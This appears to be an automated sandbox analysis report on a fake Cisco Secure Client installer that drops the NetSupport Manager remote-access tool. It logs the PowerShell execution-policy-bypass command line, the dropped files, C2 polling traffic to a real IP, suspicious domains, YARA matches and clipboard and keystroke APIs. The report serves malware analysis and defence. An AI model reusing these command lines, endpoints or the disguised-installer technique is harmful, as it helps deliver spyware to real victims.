                                  Source: is-O18K3.tmp.2.dr Static PE information: Found NDIS imports: FwpsCalloutRegister1, FwpsCalloutRegister0, FwpmFilterDeleteById0, FwpmBfeStateSubscribeChanges0, FwpsCalloutUnregisterById0, FwpmFilterAdd0, FwpsStreamInjectAsync0, FwpsQueryPacketInjectionState0, FwpsInjectTransportReceiveAsync0, FwpsInjectTransportSendAsync0, FwpsConstructIpHeaderForTransportPacket0, FwpsFreeCloneNetBufferList0, FwpsAllocateCloneNetBufferList0, FwpsFreeNetBufferList0, FwpsAllocateNetBufferAndNetBufferList0, FwpsInjectionHandleDestroy0, FwpsInjectionHandleCreate0, FwpsApplyModifiedLayerData0, FwpsAcquireWritableLayerDataPointer0, FwpsReleaseClassifyHandle0, FwpsAcquireClassifyHandle0, FwpmBfeStateUnsubscribeChanges0, FwpmuserOpen0, FwpmuserClose0, FwpmTransactionBegin0, FwpmTransactionCommit0, FwpmTransactionAbort0, FwpmProviderAdd0, FwpmProviderDeleteByKey0, FwpmSubLayerAdd0, FwpmSubLayerDeleteByKey0, FwpmCalloutAdd0, FwpmCalloutDeleteById0
                                  Source: is-0CFDM.tmp.2.dr Static PE information: Found NDIS imports: FwpmuserClose0, FwpmFilterAdd0, FwpmTransactionAbort0, FwpmFilterDeleteById0, FwpmTransactionBegin0, FwpmGetAppIdFromFileName0, FwpmuserOpen0, FwpmSubLayerDeleteByKey0, FwpmSubLayerAdd0, FwpmTransactionCommit0, FwpmProviderAdd0, FwpmProviderDeleteByKey0
                                  Source: global traffic HTTP traffic detected: GET /location/loca.asp HTTP/1.1 Host: geo.netsupportsoftware.com Connection: Keep-Alive Cache-Control: no-cache
                                  Source: Joe Sandbox View IP Address: 104.26.1.231
                                  Source: Joe Sandbox View ASN Name: HVC-ASUS
                                  Source: Joe Sandbox View ASN Name: NAMECHEAP-NETUS
                                  Source: Network traffic Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.12.23.50:443 -> 192.168.2.6:49748
                                  Source: Network traffic Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.12.23.50:443 -> 192.168.2.6:60861
                                  Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
                                  Source: global traffic DNS traffic detected: DNS query: payiki.com
                                  Source: global traffic DNS traffic detected: DNS query: anyhowdo.com
                                  Source: global traffic DNS traffic detected: DNS query: geo.netsupportsoftware.com
                                  Source: unknown HTTP traffic detected: POST http://151.236.16.15/fakeurl.htm HTTP/1.1 User-Agent: NetSupport Manager/1.3 Content-Type: application/x-www-form-urlencoded Content-Length: 22 Host: 151.236.16.15 Connection: Keep-Alive CMD=POLL INFO=1 ACK=1
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60707
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 60707 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 60703 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60703
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_1101F360 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,6_2_1101F360
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_11032930 GetClipboardFormatNameA,SetClipboardData,6_2_11032930
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 9_2_1101F360 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,9_2_1101F360
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 9_2_11032930 GetClipboardFormatNameA,SetClipboardData,9_2_11032930
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_11031AC0 IsClipboardFormatAvailable,GetClipboardData,GlobalSize,GlobalLock,_memmove,GlobalUnlock,6_2_11031AC0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_11007720 LoadCursorA,SetCursor,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,CreateDCA,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,SelectClipRgn,BitBlt,SelectClipRgn,DeleteObject,DeleteDC,BitBlt,ReleaseDC,CreatePen,CreateSolidBrush,GetSysColor,LoadBitmapA,_memset,_swscanf,CreateFontIndirectA,_memset,GetStockObject,GetObjectA,CreateFontIndirectA,GetWindowRect,SetWindowTextA,GetSystemMetrics,GetSystemMetrics,SetWindowPos,UpdateWindow,SetCursor,6_2_11007720
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_11110810 PeekMessageA,GetKeyState,GetKeyState,GetKeyState,Sleep,GetKeyState,6_2_11110810
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 9_2_11110810 PeekMessageA,GetKeyState,GetKeyState,GetKeyState,Sleep,GetKeyState,9_2_11110810
                                  Source: Yara matchFile source: 9.2.client32.exe.111b3308.2.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 6.2.client32.exe.111b3308.2.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 10.2.client32.exe.111b3308.2.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 6.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 9.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 10.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000009.00000002.2497655081.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 0000000A.00000002.2579273114.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
                                  Source: Yara matchFile source: Process Memory Space: client32.exe PID: 4176, type: MEMORYSTR
                                  Source: Yara matchFile source: Process Memory Space: client32.exe PID: 1112, type: MEMORYSTR
                                  Source: Yara matchFile source: Process Memory Space: client32.exe PID: 6484, type: MEMORYSTR
                                  Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Cisco\PCICL32.DLL, type: DROPPED
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-HOMEN.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\acsock64.cat (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\vpnva-6.cat (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-BRMT9.tmpJump to dropped file

                                  Spam, unwanted Advertisements and Ransom Demands

                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_11112840 SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,6_2_11112840
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 9_2_11112840 SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,9_2_11112840

                                  System Summary

                                  Source: amsi32_3412.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                                  Source: Process Memory Space: powershell.exe PID: 3412, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Cisco\remcmdstub.exeJump to dropped file
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Cisco\AudioCapture.dllJump to dropped file
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Cisco\HTCTL32.DLLJump to dropped file
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Cisco\msvcr100.dllJump to dropped file
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Cisco\pcicapi.dllJump to dropped file
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Cisco\PCICL32.DLLJump to dropped file
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Cisco\client32.exeJump to dropped file
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Cisco\PCICHEK.DLLJump to dropped file
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Cisco\TCCTL32.DLLJump to dropped file
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeProcess Stats: CPU usage > 49%
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_110A9240: DeviceIoControl,6_2_110A9240
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_1115A340 FindWindowA,_memset,CreateProcessAsUserA,GetLastError,WinExec,CloseHandle,CloseHandle,CloseHandle,WinExec,6_2_1115A340
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_1102CE2D InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,6_2_1102CE2D
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 9_2_1102D059 PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,9_2_1102D059
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 9_2_1102CEB1 Sleep,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,9_2_1102CEB1
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeProcess token adjusted: SecurityJump to behavior
                                  Source: CiscoSetup.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                                  Source: is-VTFF8.tmp.2.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                                  Source: is-96AL6.tmp.2.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                                  Source: CiscoSetup.tmp.0.drStatic PE information: Number of sections : 11 > 10
                                  Source: is-VTFF8.tmp.2.drStatic PE information: Number of sections : 11 > 10
                                  Source: CiscoSetup.exeStatic PE information: Number of sections : 11 > 10
                                  Source: CiscoSetup.exe, 00000000.00000000.2126103041.0000000000F39000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileName vs CiscoSetup.exe
                                  Source: CiscoSetup.exe, 00000000.00000003.2132065973.000000007F58B000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileName vs CiscoSetup.exe
                                  Source: CiscoSetup.exe, 00000000.00000003.2131548415.00000000036CF000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileName vs CiscoSetup.exe
                                  Source: CiscoSetup.exeBinary or memory string: OriginalFileName vs CiscoSetup.exe
                                  Source: CiscoSetup.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                  Source: amsi32_3412.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                                  Source: Process Memory Space: powershell.exe PID: 3412, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                                  Source: is-EUMLH.tmp.2.drBinary string: \Device\VPNVA
                                  Source: classification engineClassification label: mal54.rans.troj.evad.winEXE@10/537@3/3
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_11059270 GetLastError,FormatMessageA,LocalFree,6_2_11059270
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_1109C750 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,6_2_1109C750
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_1109C7E0 AdjustTokenPrivileges,CloseHandle,6_2_1109C7E0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 9_2_1109C750 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,9_2_1109C750
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 9_2_1109C7E0 AdjustTokenPrivileges,CloseHandle,9_2_1109C7E0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_11095C90 GetTickCount,CoInitialize,CLSIDFromProgID,CoCreateInstance,CoUninitialize,6_2_11095C90
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_11088290 FindResourceA,LoadResource,LockResource,6_2_11088290
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\CiscoJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\CiscoJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeMutant created: NULL
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2672:120:WilError_03
                                  Source: C:\Users\user\Desktop\CiscoSetup.exeFile created: C:\Users\user\AppData\Local\Temp\is-DKP86.tmpJump to behavior
                                  Source: C:\Users\user\Desktop\CiscoSetup.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpFile read: C:\Program Files (x86)\desktop.iniJump to behavior
                                  Source: C:\Users\user\Desktop\CiscoSetup.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganizationJump to behavior
                                  Source: CiscoSetup.exeString found in binary or memory: /LOADINF="filename"
                                  Source: C:\Users\user\Desktop\CiscoSetup.exeFile read: C:\Users\user\Desktop\CiscoSetup.exeJump to behavior
                                  Source: unknownProcess created: C:\Users\user\Desktop\CiscoSetup.exe "C:\Users\user\Desktop\CiscoSetup.exe"
                                  Source: C:\Users\user\Desktop\CiscoSetup.exeProcess created: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp "C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp" /SL5="$103C8,13456411,1058304,C:\Users\user\Desktop\CiscoSetup.exe"
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-S9GUG.tmp\cispn.ps1"
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\Cisco\client32.exe "C:\Users\user\AppData\Roaming\Cisco\client32.exe"
                                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\Cisco\client32.exe "C:\Users\user\AppData\Roaming\Cisco\client32.exe"
                                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\Cisco\client32.exe "C:\Users\user\AppData\Roaming\Cisco\client32.exe"
                                  Source: C:\Users\user\Desktop\CiscoSetup.exeProcess created: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp "C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp" /SL5="$103C8,13456411,1058304,C:\Users\user\Desktop\CiscoSetup.exe" Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-S9GUG.tmp\cispn.ps1"Jump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\Cisco\client32.exe "C:\Users\user\AppData\Roaming\Cisco\client32.exe" Jump to behavior
                                  Source: C:\Users\user\Desktop\CiscoSetup.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Users\user\Desktop\CiscoSetup.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpSection loaded: mpr.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpSection loaded: version.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpSection loaded: winhttp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpSection loaded: wtsapi32.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpSection loaded: winsta.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpSection loaded: textinputframework.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpSection loaded: coreuicomponents.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpSection loaded: coremessaging.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpSection loaded: ntmarta.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp Section loaded: textshaping.dll
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp Section loaded: dwmapi.dll
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp Section loaded: shfolder.dll
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp Section loaded: windows.storage.dll
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp Section loaded: wldp.dll
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp Section loaded: sspicli.dll
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp Section loaded: explorerframe.dll
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp Section loaded: sfc.dll
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp Section loaded: sfc_os.dll
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp Section loaded: propsys.dll
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp Section loaded: profapi.dll
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp Section loaded: linkinfo.dll
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp Section loaded: ntshrui.dll
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp Section loaded: srvcli.dll
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp Section loaded: cscapi.dll
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp Section loaded: edputil.dll
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp Section loaded: urlmon.dll
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp Section loaded: iertutil.dll
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp Section loaded: netutils.dll
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp Section loaded: windows.staterepositoryps.dll
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp Section loaded: appresolver.dll
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp Section loaded: bcp47langs.dll
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp Section loaded: slc.dll
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp Section loaded: userenv.dll
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp Section loaded: sppc.dll
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp Section loaded: onecorecommonproxystub.dll
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp Section loaded: onecoreuapcommonproxystub.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kdscli.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: edputil.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.staterepositoryps.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecoreuapcommonproxystub.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: apphelp.dll
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Section loaded: apphelp.dll
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Section loaded: pcicl32.dll
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Section loaded: shfolder.dll
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Section loaded: pcichek.dll
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Section loaded: pcicapi.dll
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Section loaded: mpr.dll
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Section loaded: version.dll
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Section loaded: winmm.dll
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Section loaded: wsock32.dll
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Section loaded: netapi32.dll
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Section loaded: wininet.dll
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Section loaded: msvcr100.dll
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Section loaded: msvcr100.dll
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Section loaded: netutils.dll
